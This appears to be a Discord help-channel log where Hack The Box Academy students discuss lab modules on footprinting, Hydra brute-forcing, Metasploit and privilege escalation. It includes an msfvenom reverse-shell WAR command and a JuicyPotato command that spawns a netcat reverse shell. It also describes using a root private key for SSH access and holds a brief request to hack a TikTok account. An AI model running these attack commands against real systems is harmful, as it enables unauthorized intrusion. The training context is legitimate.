#modules

should i ftp//21 or ftp//<ip>:<port>

You need to attack it from the inside

#modules message AD Trust attacks module, I still have not found a good solution to this. I tried tmux but the format was kinda bad. Anyone know of a way to allow the terminal to scroll after connecting to a windows host via proxychains ssh?

i am

Also default port for ftp is 21

You can specify 127.0.0.1

Instead of thr public ip

Since publicly 21 isn't open

how does that work and where do you get 127.... from

Loopback

Basic networking

Loopback is like calling a different hotel room from your own

The room in this case would be the port

how do i read the flag.txt file as an ftp>

I have to found FQDN of the host but there is no bind file what i should do ?

how do i exit ftp acc

got it

I mean test for pw reuse

Once you find a pw

Or in ftp if you see a file you want to read you can generally read with more

I would recommend going over the prerequisite modules to help you better understand the services. Intro to Networking, Linux Fundamentals, and Web Requests are prereqs for the Login Brute Force module.

Honestly basic networking goes far here

Hmm

Can I use metasploit to generate a war file with a reverse shell payload

msfvenom, yes

The command cheat sheet includes one, and I believe you also did something similar in one of the sections

Ok. I think the default payload doesn't work not sure why

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Seems the ticket

<@&861185840277487616> uhh

For the "Exploiting Web Vulnerabilities in Thick-Client Applications", do you just remove all hash values from the MANIFEST.mf or everything below the header and leave a space? I've followed the instructions for that first part, but the jar hangs after submitting creds no matter how i configure the manifest. Any help appreciated

wd waea WAD wa aawawaw][

Looks like I can communicate with the server:

module: Intro to C2 Operations with Sliver
Section: Probing the Surface
Question: Assess further the web application and submit the name of the database user
Description: I put in every user found in ||C:\Users|| but non of them correct. Can anyone tell me how you guy found the user ?

Connection to the target machine in the lab is very funky rn. I've tried 5 different VPN servers + 5 different target machine + 5 different pwnboxes (and personal VPN connection as well) but still get connection problems.

For example, if you ping the machine for a long time, you'll get 1500~2500ms spikes around every 20~30 ICMP requests. Sometimes, the spike is larger or the box becomes unresponsive. That's why your sliver connections are dropping, and that's why your cme connection sometimes fails, and sometimes succeeds.

Even with the timeouts, you'll occassionally see that your sliver beacons won't spawn SYSTEM beacons with getsystem, or just randomly dies when you run the COFF loader commands listed in the labs.

Since I don't think it's intended, just decided to stop with the module.

The db user may not be a standard user then

¯_(ツ)_/¯

At least that's my first thought if all users in C:\Users\ doesn't work

Could be a svc user

Like sql_svc or some such

thats what i thought at first, but nah XD

Huh

Forgot winblows drops service accounts on disk

since this is Tier III hard level, i think they will expect me to perform certain skill that not included in the section

since the question talk about database.... i might wanna do something with mysql or sqlmap

after removing the hash values from the MANIFEST.mf file and re-archiving my jar. I launch the jar, and attempt to login to the server, but the application hangs. I see the client is connected to the service, but doesn't get a prompt

I suspect the extraction process might be clobbering the manifest.mf file, I see class files are split between two lines like below:

sorry to bother guys, just need some help with something. Does anyone know someone who can dox or hack a TikTok account? Not for malicious purposes, a friend of mine is being harassed

in the nibbles "prievilige escalation" in getting started section in CPTS, i used "sudo monitor.sh" , it asked for password but when i added full path to sudo i.e "sudo /home/nibbler/personal/stuff/monitor.sh" it didn't asked for password!
so is there a difference between using sudo with relative path and aboslute path?

perhaps; if you look at the overview it should tell you what modules it expects you to have done/know about

it's just that relative and absolute

when a user has sudo permissions over a binary path they have it specifically over the full absolute path

not the relative path

I see thanks 🫡

it's mostly because monitor.sh could be any program anywhere

even if you're in the right directory

but /home/nibbler/personal/stuff/monitor.sh is specifically that location

I didn't knew that, sudo will look for files like that

yep

sudo checks explicitly about path

if you have (ALL):(ALL) then you are effectively root/admin user

Thanks for explaining

i believe something similar comes up in the knowledge check so keep an eye out 😉

Hhhh, 🫡

this is easily the most frustrating lab of all time

this manifest has to be preventing the jar from loading properly

lfg configured git repo for my notes

#cpts message @pastel oak check for zone transfers to subdomains

you'd still dig @target_ip just instead of inlanefreight.htb you'd do subdomain.inlanefreight.htb

Does anyone know why I'm getting this error when attempting to use the -TrustedToAuth parameter with Get-NetUser?

PS C:\Users\bob\Downloads> Get-NetUser -TrustedToAuth
Get-NetUser : A parameter cannot be found that matches parameter name 'TrustedToAuth'.
At line:1 char:13
+ Get-NetUser -TrustedToAuth
+             ~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Get-NetUser], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Get-NetUser

Did you work this out? I'm having the same issue

quick question, is there any sliver command that speed up the beacon task ?

what module and section is this

Windows Attacks & Defense
Kerberos Constrained Delegation

what have you already done?

btw have you import powerview yet?

Imported PowerView.ps1, and then used the command. It doesn't work with the -TrustedToAuth parameter, but Get-NetUser works by itself

is the machine also slow on your end?

btw

run powershell as admin, use powershell -ep bypass, import powerview ,then run the command

No luck, here's my screenshot

turn on powershell as Administrator

ok trying now

Yeah, still same error

DM me, bud

Hi guys

I tried using dig and nc to find the fqdn that imap and pop3 are assigned to, but no results...anyone got any ideas?

I think ill do this too and wait tillt the connection will get better.

Im on the footprinting module

Yes, read the module, the answer is there.

Indeed, gubarz is right

okay thanks...i already did read the module but it seems a bit tricky

It's super not tricky and the answer is spelled out. I don't even think dig or netcat is mentioned on the page.

ok ill have another look

It’s not I literally done this module 30 min ago

I'm on phone, so I wasn't going to try to search the page, but my notes and a quick glance said no.

im sorry could u give me a tip?

The command to run is on the page. Look at the footprinting bit. You won’t find the naming FQDN in the results. You gotta read the result

ah that makes more sense

thanks for that

Good luck 🤞

thanks man just solved it

Great job 👏

im not sure if my method was correct tho Ill explain

I used this command ```openssl s_client -connect 10.129.197.72:pop3s

and got this in the result

but the answer is after the @

and its a bit hard to know and identify the fqdn

Read a bit before that mail address. There’s the CN

is it possible that we can identify the fqdn from an email address?

ahh so CN is also fqdn?

That’s the Common Name aka FQDN

ahh thanks

You could have also used the first more common footprinting tool... 😉

u mean nmap?

yo guys I m on question 3 and need to enumerate through the imap server to retrieve the flag..I have logged in and also I have found that there is a mailbox called "flags"

when I try to list the mailbox content using 1 FETCH 1/FLAGS all it returns an error...anyone have any ideas?

See previous comment

u mean this?

Probably this

ahh ok 😂

yea just that ive tried following what it says but for some reason giving me error

* 1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))

I managed to find this using the fetch all method

it says flag but the module wants it in a specific format

fetch all doesn't give the complete email body sometimes. You need to research a bit more on what can be done with FETCH command.

okay thanks

ive tried asking gpt for some clues but its not helping 😦

https://www.atmail.com/blog/imap-commands/

also tried this site

as u can see there is "flag"... is there a way I can cat it or something

https://donsutherland.org/crib/imap

thanks...still trying

Which section you working on

footprinting

Imap?

Which protocol?

Have you tried the FETCH command examples that are shown in here?

Hello, I have a problem about privilege escalation from ilfserveradmin to administrator on Lateral Movement section of Attacking Enterprise Networks lab, I followed each step on exploit-db, but it doesn't work.

did you solve it ?

yea and thank you I managed to solve it thanks to @rustic sage

it was actually when u connect...the inboxed dont have the flag @rustic sage saved me a lot of time cos what I was doing was futile

Yeah I did eventually. I think it worked exactly as the poc said it should, it was just finicky on the target. Like i tried 7 times with no luck and on the 8th it worked.

so funny, I hope in the exam, we don't have such case))

You probably will, thats just how software is sometimes.

Hi I am in windows escalation module and I need to use juicy potato what am I doing wrong here any pointers I missed?

The command I tried to use with clsid
.\jp.exe -l 53375 -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E} -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\lol\nc.exe 10.10.14.28 8443 -e cmd.exe" -t *

im having a hard time understanding what ports are. can someone explain like im 4

theres like TCP and UDP and Bluetooth and server stuff but aren't ports the cords that connect to your pc?

yea those are physical ports

the ones called TCP and UDP are logical ports they are built in the software of a system

there are a lot of services running in a system, if all of them are listening on the network how will your system understand which traffic is for which service. Now think of your ip address as an apartment complex and the ports are the apartment numbers within the complex. If a mail arrives with you apartment number the mail will come to your doorstep right

its the same with ports

bro got big brain

https://tenor.com/view/you-are-the-best-talking-smile-gif-14123320149159124796

Somehow,I can't connect to academy vpn yesterday until now

Both TCP and UDP and alternative server

once try changing to a different internet connection and connect again

ok

Don't overlook daddy dns

I don't had any dns now

I haven't used "juicy potato" and I can't spot what's wrong with the command, however what I can tell you is that you can use something else to escalate your privileges

My command needed some double quotes and then it worked like a charm
btw I will like to know about the other super secret technique

to escalate

other super secret technique is on Google, notice the user token privileges and have a look

ok thanks I will look into that

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
this one??

You can use HT if you want to, and yes it's there

oh you have to submit the external domain admin

make sure its in the section Domain Reconnaissance

I learned that these are subkeys of HKLM from windows fundamentals but they are referred to as hives here, what are they?

They are hives
Like SAM hive

Hi, I am doing DNS Tunneling with Dnscat2 section of "PIVOTING, TUNNELING, AND PORT FORWARDING". I have read the contents and I also managed to do the exercise. But I am not sure I understand what's happening. The DNS client has to be a DNS authoritative server? Can someone refer me something that will help me understand it?

I am also getting the error on powershell:

HTB lab is so slow. I used THM, then was disappointed about HTB

Agree, but content wise it is totally worth it

Sometimes it get to the point of not being usable actually, i hope they change that soon

You can read the overview directly from the dev himself:
https://github.com/iagox86/dnscat2

sup everyone i m kinda stuck in INJECTION ATTACKS-->Skills Assessment i have found the pdf generation vulnerability and i have found the xpath injection but i couldnt really use at im not able to get anything useful from it

Any suggestions?

Dm

Do you still need help with that?

Try using one of the examples in the section it will produce a slightly different output

Don't overcomplicate it

Hello

Are you guys using pwnbox or your own vm?

No idea

I am one of the authors, yes

You can try combining the techniques taught in the intro to evasion module and you can combine it with whatever you can think of as long as it works in the end

That being said, you will have to focus on the stagers, rather than modifying the whole codebase related to implant generation

as it can become overwhelming

thanks check ur dms

This is exactly my experience! Can the admins confirm the lab isn't broken. I was able to assemble the jar, login without issue over the weekend follow the process in the lab manual. But now I'm just spinning my wheels.

is it better to use UDP or TCP for my openvpn connection?

can anyone help me with the simple module 20 section 16 (Create the XOR ciphertext of the password 'opens3same' using the key 'academy'.)

I'm pretty sure that my solution is correct, but it won't accept the flag.

I'm on Getting Started -- Web Enumeration, and am trying to use the commands given in the notes to find the flag. However, when I use "sudo apt install seclists -y", I get this (attached image) as the output. Could someone please explain what the error message means, and how to resolve it?

The message output says everything. Probably it's not in the repo, are you using your own VM or the pwnbox?
You can also download it from the github repo:
https://github.com/danielmiessler/SecLists

Hello. I keep having problem when I tried to install some tools on Parrot OS. I managed to install python2.7 thanks to some advice yesterday (I did it with docker). I also managed to install spiderfoot. But now I have 2 new errors. I did some research for crackmapexec, I even tried to see if it was possible to install it and its dependencies with docker or venv, but nothing worked. Did I do something wrong or have you some advice to share please ?

I'm using the pwnbox provided by htb, I'll try downloading from the repo 🤍

Btw thanks to the guys who've helped me yesterday. (sorry I don't remember the username), it was very helpful !

install this instead
https://www.netexec.wiki/getting-started/installation/installation-on-unix

it's the same as cme but updated

Okay thanks! I started think crackmapexec was deprecated too

Friends, who works on mac OS here? can you write to the pm please? I have a problem with raising the python server in vpn

I reset the box, reassembled the jar and I was able to connect. That vm pool doesn't load consistently

Thank you! It worked, and I was able to find the flag. Very appreciative 🤍

I have exactly the same error as here https://forum.hackthebox.com/t/vpn-connection-problem/3467
But it didn't help me.

TCP

hii! i'm working on Getting Started --> Public Exploits. I understand the steps, and I got the flag, but I have a question about finding vulnerable applications. How would I know that openssh 7.2 was vulnerable? what cmd could i use to find all services on the ip address? i tried nmap -sC -sV, but it didn't show openssh 7.2, even though it was running on the server and was exploitable to achieve the flag

Nmap won't always show everything and openssh7.2 isn't the vulnerable thing on that section

it's not?? i could've sworn it was

There's a running web server yes?

"got flag" == thought i had the path to get it 😭

i think so

Why not visit it in a browser

:)

Note: this module is the basics

They wouldn't have you do anything complex or that requires any extra setup beyond just looking

Idk where you got the openssh path from lol

how would i know what wordlists to use and plists

this didnt work

@quartz cradle are you ssh to the target?

@open summit you gotta get better at providing context man

mhm, that got me to a wordpress webpage

Skills assesment - website section

Read the page

If we're to reframe this question more generally as "How would I know that X software was vulnerable", the answer is to either search it up on google or research the software yourself (and perhaps find a zero-day)

If your question is more along the lines of "How would I be inspired to look it up in the first place", well that I think just takes practice. That's what enumeration's all about

What is the login form? Is it a /GET form?

Use the appropriate login type

it was in the notes, and i got the same output as the example when i ran searchsploit openssh 7.2

What notes?

My notes say nothing about openssh7.2 for this

searchsploit is just a CLI for exploit-db.com. It doesn't automatically spit out exploits for your target

maybe i'm overcomplicating it, then.. 😭

Read the webpage

the info that comes before the pwnbox

As this has to do simply with a vulnerable plugin

That's just an example

It just so happened to work, but that's not always going to be the case

Simple Backup Plugin 2.7.10 for WordPress?

Yep

Just search for the first 2 words

note to self: clean my glasses 😭

alr 🤍

And it's likely far simpler than trying to do the ssh one

this is the form

It's an http get

So what does your notes say about attacking http forms

notes?

Brother

You should be taking notes

This is why you tend to ask lots of questions

There's a whole section on the http forms

Get and put

And how to attack them

http[s]-{head|get|post}

Which do you think is most relevant here

https[s]-{get}

Without brackets and is this an https site

no it is not sir

so http-{get}?

Brackets aren't needed

so http-get

If you read the sections (and they even had relevant exercises) they explain the format

For future reference, CLI help text has a convention with that notation

• [x] = it is optional to type x
• {a|b|c} = choose one of a,b,c

So http[s]-{head|get|post} is a condensed way of saying you can choose one of the below:

• http-head
• http-get
• http-post
• https-head
• https-get
• https-post

Yes I just can’t seem to get down the right path…

running impacket-psexec gives share not writeable

evilwinrm give us powershell access

There's an example command that might be helpful

is this what the question is trying show?

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -u -f 94.237.54.233 -s 46655 http-get /

this should work tho and t doesnt -

Try a different list maybe

for both usernames and pass?

Getting Started --> Public Exploits

I ran the exploit successfully, but didn't end up at meterpreter like the example shows. What am I supposed to do after executing the exploit against Simple Backup?

Oh I know your problem

run a session maybe?

Because that exploit isn't rce

Im listening boss

Read the description and look at the options

Read the first few lines of the default list

The default list is a username:password list

So it's meant to be used with a different hydra option, as explained by the module

@fathom pendant can you help on this

if you read the question it tells you what it wants ¯_(ツ)_/¯

There's a reason it says to use other options

Wdym

What’s rce?

so like what od ido

Remote Code Execution

Fuckin read

If you wanna know hydra commands how would you check them

Brother it's a remote/arbitrary file download

It's not a shell

Not all exploits are shells

hydra -C

Bingo

Now go do that

what file should i use tho

The one you were trying to use as your password 🤦

At some point you gotta apply critical thinking

I like your funny words, magic man

bros on his last straw 😭😂

I’m really new to this, so I need to go slower/simpler than you’re used to 🤍 i appreciate your help and patience

we all start somewhere

yuppp

Just one step at a time

Never make assumptions

And if you do, be prepared for them to be wrong

the sad part, is I passed my security+, and yet i struggle so much w/ htb 😭

Sec + ain't shit dog

it gave me an ego boost that htb absolutely tore to shreds 💀

sec+ doesnt really go hand to hand with htb lol

It's a multiple choice exam about memorization of basic stuff

I can't comment because I have no sec-related certs 💀

it really is

nah you’re good, i’m not trying to pull rank 😭

CompTIA certs are fancy toilet paper certs

humbling 💀

Mostly for gov stuff

but true, i didn’t really learn anything practical

if this were covid era it may still be cheaper than actual toilet paper tbh

But ultimately crumbles against practical certs

got a quick question on the last question on the DNS module on footprinting, in the end i managed to bruteforce it using dnsenum but im wondering how i would have spotted this manually just using dig queries? the only difference i've noticed was without spoiling it the subdomain that was "bruteforceable" contained a SOA & NS record on a normal dig query whilst others only contained A records - however it didn't let me do a zone transfer. maybe im not understanding correctly hmm

The point is to use the tool

But you may be onto something

Either way it's beyond the scope of the module

It's a lot of editing your hosts file afaik

yeah gotcha, so going forward for DNS footprinting best practice is to just dnsenum absolutely all subdomains i find through my initial dig query then?

Yep

I did a for loop for it as a "well idk but it's one of them" kinda things

mmm yeah i guess so, might spin up a bind9 server and mess around with it a bit more

Hey, so I am working on Linux Fundamentals. I'm currently trying to complete the task in 'System Information' but I believe there is some type of glitch. I load up the box and ssh into the student account. Once I use the "uname -a" command I begin to parse it into my answer boxes but they are saying most of my answers are wrong. In order to do the step-by-step, I need an annual membership. I can't afford that. lol.

but anyway i just wanted to clarify what i should be doing for future DNS enumeration

so find out the NS and then dig what i can and just dnsenum then

so after running the exploit, what should I look for / do? since it’s not a shell

@lucid halo bear with just spinning up the VM

i haven't done this module just yet but i'll try submitting answers

Thanks! I'm waiting...

generally you should read a bit on how the exploit works before you apply. If in msfconsole using info on the module will get you some insight

i didn’t know that was an option, thank you so much!

The question is looking for just the version number, make sure you don't have any white space around your answer.

you can also type help or ? to get a list of commands so you can help yourself 😉

there's a separate module that introduces you to metasploit and it's free (tier 0) so you can check that out later

There are multiple questions here, just realized that I can't send screenshots.

Well which question

socks is it the first question?

So the questions are asking about Network information, they aren't hard I'm just confused. I'll try to just power through it.

I ran info -d and received an output saying to generate documentation for something, then opening a .html file path in a browser (which, when i went to, said Not Found). I’m honestly really unsure where to go from here, I don’t understand what it wants me to do after running the exploit to get to the flag. Could you please explain in simpler wording where to go from here?

No, the first one was the easiest lol.

give me an example of a question that isn't accepting your answer

Which shell is specified for the htb-student user?

Hey, since I may never get to this modules or anything related to them
Can someone explain or introduce me what is deserialization?

@lucid halo worked for me

use the full path of the shell

there's an environment variable you can print to display it, copy that

@rustic sage its Linux and it won't accept my anwser

it is not linux

Please explain

linux is the name of the OS

the question asked what shell, not what OS

right but even if I put ubuntu it won't work

shells are whats used to interface with the OS and accept commands

maybe you neet to google what's shell

or re-read the section

if you use info -d it should still tell you the filepath of the generated html that you can just open in your browser manually. But often info by itself should be enough.

It's also worth checking show options to make sure your module's configured right before you run

so for example when you run uname, you're not using linux directly you're using a shell that talks and can interpret to linux directly

Yes, I understand this part. But even if you look in the instructions before the assignment, they identify Linux as a shell.

I understand that Bash is a shell for instance or Debian

then there is your answer

Debian is a Linux distro and not a shell per se

how do I un-set something? I accidently set my VHOST instead of my RHOST

shells are like bash, zsh ksh etc

unset VHOST

as cydroz said debian is an OS

there's an environment variable that stores the shell thats being used for that current users session, you can print this by using echo $SHELL in the terminal

A Linux terminal, also called a shell or command line

It does not say Linux is a shell, or that Ubuntu is a shell, but that the terminal is a shell, or command line

@rustic sage what answer did you give?

That fixed it! now i’ve arrived at a page that says WordPress Simple Backup File Read Vulnerability

google how to find current shell in linux

it gives examples for changing the RHOST though, which doesn’t seem like it would help me get to the flag

if you look slightly before that text i gave away exactly what the answer is

Thanks

RHOST = "remote host", aka your target, you need to set this to the machine IP.
Similar deal with RPORT
It's explained in the module briefly

nothing happens when i enter the credentials on the login form

of the target? so RPORT would be 51382 if my target is 94.237.52.13:51382

yes that's right

all good!

it ran without giving me any errors, which is good, my problem is that i don’t know where to go from here

when i do ls i get 3 files, none of which are wordpress or flag

you might have missed it but the question tells you where the flag is

OHHH

got it, i really need to pay attention to outputs. thank you immensely @fresh plinth

Hello again, I have a question. I'm on the Windows section of the Setting up module, and I was thinking. I don't want to bother installing a trial version of Windows on a VM since it is time limited, and I can't buy a product licence. Do you think I can use my host os, which is Windows 10 (I already seen that it's not recommended, but I prefer to ask just in case), or can I skip the Windows setup for now ? (I already managed to setup a vm of Parrot)

no prob, take it as a lesson to read carefully and make sure you've evaluated all the info available to you

Rather than grabbing the evaluation editions of windows you could just get an image of windows home/pro unlicensed to build a VM no?

And using bare metal is not recommended because you'd be connecting it direct to a hostile network basically

verify

also just to piggy back on this you can get an eval license and rearm it 5x times for 900 days eval

aaaa i’m literally right at the txt file, but neither cat nor type are allowing me to view the contents

Okay I will try to search for an unlicensed version. Thanks !

Because you need to read #rules and #welcome

i did not know this and that's funny to me somehow

Why am I unable to message in #general

Oooh I was thinking that a unlicensed version of Windows would limit us

haha yeah so you get 180 days to evaluate the license but if you open a powershell window and do slmgr – dlv it rearms it for another 180 days

@wintry hull

you can do it 6 times maximum if i remember correctly

what cmd allows me to view the contexts of a txt file while in [msf]?

Take a wild stab, else use the help command

There are limitations but they're all irrelevant I think.

I didn't know this too, I will note that somewhere

Yeah I've seen it's more customization of the desktop etc. than anything else

Even then there are workarounds to those 😉

you can use cat as normal

Oooh I will try to look into that !

Did but still can't

Btw sorry for all the questions. I'm pretty new in Cybersecurity

i tried that, and i get what looks like an /etc/password file

Review the options

me too, but we all start somewhere

There's a clear reason why it's /etc/passwd

what options?

For the exploit

straight-up show options?

Just options

Ideally I'll never have to apply this knowledge but I hope to remember this if that time comes lol

That should show you what you're looking for

i see FILEPATH is set to /etc/password, is that why?

If it looks like a duck

If you read it you'll know what to do, if you tried it and are having issues you should reach out to support.

there are (semi legit) ways to activate it, use your google skills

so options explains why it’s an /etc/password file, but not what to do with the file to get to the flag

How would you change a setting

working at an MSP you get to know lots of things like that

oh i’m stupid

I think I found those ways, but for now I will try with the unlicensed version. If I'm limited, I will try those ways

i am stealing that expression

i change /etc/password to /flag.txt?

Try it first, ask questions later

yessir

Thats an old expression

If it looks like a duck, and quacks like a duck, it's probably a duck

noooo it didn’t work

Aka sometimes it's that obvious

still an etc password file

How did you get the lhost setting changed

great, something to look forward to in the future perhaps lol

😉

the what now?

You s.. the variable

Lhost

Rhosts

My bad

Same concept though

i set it to my target host

You what 😉

You s.. it

??

So same syntax

marcie you're such a tease

s.. is the command, missing two letters

set

I encourage critical thinking

what variable

If I just give the answer, nothing is learned

rhost is the target ip

Variable = option

So what variable would equate to the information you have

RHOST should just be the word option?? that doesn’t work

facepalm

/flag.txt ?

Rhost is the option/variable for your target

But you need a file location

marcie im stuck on this question still like ive tried

not the sharpest nail, i’m sorry 😭

Take it slow

/flag.txt, no?

idk what it is

Yes, but what do you need to change to get there

used this format and it found passwords but then they dont work when i type them in the form

filepath

So...

i set filepath to /flag.txt

this is torture

Are you asking or telling

i can't bear to watch

i still end up with etc password

you got this aml

Then you did it wrong

gotta do it for the bag

Or you're missing the part where it's saved to a different file

And you're likely reading the same file expecting different results

i should change my display name 💀

it's getting too late for me but i wanna see aml bag this flag lol

That should work

oh wow

now it works i tried it before it didnt

Likely mistyped

The second one can be tricky if you don't set the parameters right

go to sleep, i don’t think this is getting figured out anytime soon 😭

which section you doing

aml just out of interest which exploit are you using

Just pay attention

OH MY GOD

To the output

omg

It's that shrimple

I GOT IT

has it clicked

kaching

FINALLY

lets go

It only gets harder from here 😄

lesson learned: tell someone to go to bed and you'll be enlightened

that was by far the most satisfying this ev— NOOOOO HUSH MARCIE

ima use this for the seconed one

I mean as long as you actually read the material and take notes you're fine

Why? You have a valid username already

do I?

The one that got you past the first question

but then thats a different form tho

like why would the user be the same but passy different

@vagrant osprey which exploit/module was this?

Security

¯_(ツ)_/¯

fair true cuz inorder to get

Getting Started —> Public Exploits

ye true should be the same user

Also your user and pass input are incorrect

why

Take a look at how the form expects them to be passed

Either through a tool like burp or through browser network tool to inspect the request

Always be aware of what the form looks like

ahh its user and pass

so non capitals

Again re-read the section about http-post if you need more clarity

^USER^ and ^PASSWORD^ will be the same as those are where hydra will inject the user and pass respectively

thank you so much all of you who helped me, i truly appreciate it

Go sleep

You need a break

who, me? it’s 11am 💀

ah so instead of username and password it will be user and pass

Try and find out

Also be sure your fail string is correct

And the login point is correct

Is the page you're on "login.php"?

Is the html correct

hello guys , Is there a module where I can learn ADCS attacks?

Probably

https://academy.hackthebox.com/module/details/236

Too easy to give the answer lmao

It's even funnier that it's titled "ADCS attacks"

EXACTLY !!!!!

Didn't even attempt looking it up on academy

My cube is not enough for that module :((

Even using the half-baked search feature

Well. That wasn't your question

if you're planning to do CPTS, ADCS is out of scope

you can get discount if you are student

It would likely cause you to overthink more than it would help

It's tier 3, it's not covered by student sub

yea

oh yaaa

Is there any resource you can recommend? 🙂

blog

Google

google

¯_(ツ)_/¯

@fathom pendant got a date for when you're doing the CPTS? i expect you to get all the flags in 24h based off how helpful you are instantly

Why do you need/want to learn ADCS?

When I can, currently plate full

omg wanna read my blog post on ESC1 ADCS?

its my only blog post

I'm in the final stages of my job interview and there will be questions about this topic.

Then google

Im very lost in the osTicket portion of the Attacking Common Apps module, can somebody point me in the correct direction

Even be willing to admit, I don't know off the top of my head

@cedar yew ADCS are very common in the wild because microsoft documentation recommends templates to allow "allow requesters to include SAN in template" for autopilot builds

which allows anyone to specify a domain user to impersonate and receive a .pfx that can be used to authenicate against kerberos

i managed to get domain admin at my work bypassing windows defender + darktrace using that trick

you never know who might be in this group, fully agree with @fathom pendant being honest about your level of knowledge is the right thing.

not to mention, those who ask, probably know the answer, and have a highly honed bs meter

Depending on the level of job you applied for, they may just be looking to weed out people who bsed their resume

marcie will i be told off if i link my blog post

ye we talk enum AD kerberos ntlm llmnr

and last subject

Yes sentenced to 12 years in the dungeon

adcs

There's a #community-content channel if it's not relevant to academy

check out certified preowned either way.

okey

thank you

https://posts.specterops.io/certified-pre-owned-d95910965cd2

@cedar yew i linked my blog in #community-content not forcing you but i feel like its a cool read 😄

all feedback welcomed

it is my first blog after all

thank you

tried this for second part cant seem tof ind the password

hello, can I check if there's any support team that can help?

The support button in the website keep spamming me with Swag stuff and not going away

Email them

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

The support team does not monitor the discord

marcie u mentioned something about fail string

Thank you for the info

Yes, and the fail string is explained in the http-post section

Also is your endpoint correct

ye thats correct i got thae right one

Is the page you're trying to bruteforce, login.php

ye i just seen now

its admin_login.php

so would forname='log-in'

Try and see

Again. These are all things taught to you by the module

I think their support site also down

¯_(ツ)_/¯

https://status.hackthebox.com

Also delete because spoilers

But again did you try it or are you asking me if that's coreect

i tried it

Then be patient

its gonna take forver i cant do the rocky.txt

Yes you can lol

Estimated time is how long it would take to go through the whole list

Not to get you the desired answer

(You can also use more threads)

i put -t 4

to speed it up

You can do more

-t4 is very slow

whatshould i do t what

It shouldn't take too long either

Well commonly these types of services can handle 48-64 threads

i did -t 48

Also: keep in mind the page you see when you log in; this is important for the following skill assessment

Just. Be. Patient

Also make sure it's ^PASS^

¯_(ツ)_/¯

Slight spelling errors can be the death of you

i got it

used rockyou-75.txt

Patience is a virtue in this field

I just used the full list

thx marcie boss

It didn't take but a few minutes

¯_(ツ)_/¯

I don't know what part of the module you are in but there was also a technique that was talked about to generate custom wordlists for websites so maybe ur meant to use that here

Nah

That's the next skill assessment

Spoiler 😠

This first one is meant to use a generic wordlist

I mean if he read and followed the module; it's obvious

And took notes

¯_(ツ)_/¯

I mean yeah I would do that but idk I feel like it spoiled it a bit for me

Also kinda basically what the first question tells you to do

Oh

if the question asks for it then my bad

"Using information from the previous assessment..."

"As you now have the name of an employee from the previous skills assessment question..."

Yep you know the name and it even tells you to use usernameGenerator to generate usernames

There's another tool used, and they even talk about using sed to cut things from wordlists

ye thats the password policy

Again, all things taught to you by the module

yes boss

Getting Started —> Privilege Escalation

I got the first flag, and am now onto the second, where I need to escalate from user2 to root. I ran dpkg -l and saw adduser version 3.118ubuntu2 was an option, so i looked up exploits for it and could not find any. None of the other packages seem fitting for privilege escalation, so where should I go from here?

Overcomplicating

ls -la /root/ and see if something stands out

Hint: file permissions

Privesc isn't always about software vulnerabilities

chloe

?

Huh??

probably just typing their password into the wrong window

Skill issue

Try harder?!

chmod

Ah

it autocorrected and the edit didn’t go through 😭😭

Bur chmod isn't until after you figure out the interesting file and copy it over

oh

Sometimes they're hidden in plain sight

Any file or directory prefixed with . Is hidden

ls -alh then

The h isn't necessary

Also.

nothing really stands out to me

i got into .ssh/ if that’s what you meant

Indeed

Something interesting in there

authorized keys, id rsa, and id rsa .pub

File permissions >> owner|group|others

Since you're not root, or in the root group, you'd be classified as "others

right

so i can only read the second two

Perhaps you can read something

The id_rsa file is powerful

It acts as an authentication file

And when you consider it's owner, I'd say it's very useful

it’s a private key

Yes

But who's private key is it? (Owner)

root

So...

is there a way to use a file as a password?

Sort of

-i id_rsa is used to indicate that you're using an auth file

what is the -i for

Identity

man ssh

i have to unminimize to get to the man pages

can’t

tried ssh -i id_rsa and was prompted for user2’s password

Well

whose id_rsa is that

root

Copy the id_rsa to your system

And ssh from your system

The whole file is the id

wdym by ssh from my system

How did you first ssh in

ssh user1@94.237.62.124 -p 54910

Switch user1 for root, and add the -i id_rsa

After you copy over/create the file

is it supposed to be just sitting there

no changes

Wdym "just sitting there"

Brother

You gotta ssh from your vm

Not the target

o h

You gotta find a way to get the rsa file on your machine

you can also ssh locally without exiting your current ssh session iirc

Also there's a full-screen button for the pwnbox

Module: Broken Authentication
Section: Default Credentials
I am having an issue with the question I found the default credentials on the vendors website but it will not accept the answer. I put in other default credentials too. Can someone point in the right direction?

Try looking up a default wordlist the answer does have to do with the vendor

But not all info on the page/title is 100% needed

ok

is there anyone to have solution to this problem?

I have looked at three different source of that vendor default wordlist all them say come up with one pair of credentials

jerryrigged it

copied it, went back to my vm, pasted it into a new file

i’m a genius

mm it doesn’t like how much access the file has, now is chmod time

AYYYY GOT IT

That's literally the intended method

And now my Windows 10 VM is laggy. 100% disk usage on the task manager of the vm. After some search, it seems that it's because my vm is on an hdd or maybe I didn't allocate enough ressource (I've allocated 4go of RAM and 2 CPU Core), it seems the Antivirus of the host can reduce the performance of the vm so I excluded the folder which contains the vm

Likely because hdd

Welp. I think I will use Parrot until I can have a SSD

4gb ram on windows is tuff

I mean minimum ram for win10 64bit is 2GB

¯_(ツ)_/¯

marcie what do you daily drive

you strike me as a mac kinda person

dunno why

Windows

I'm not a fan of MacOS

wow I didn't try one set lol

cant rdp connect through xfreerdp
but works through remmina

/cert-ignore also didnt help

$$ is a variable call, wrap in single quotes

$$ calls the PID

ohh, got it

Any special characters you should generally be wary of

Best to wrap the string in single quotes and call it a day

Yup I think I will stay on Parrot. I don't know how but the disk usage of the Windows VM stabilized, but the update etc take too much space. And I think I will prefer a Linux os to do pentesting

Yeah Windows is space hungry

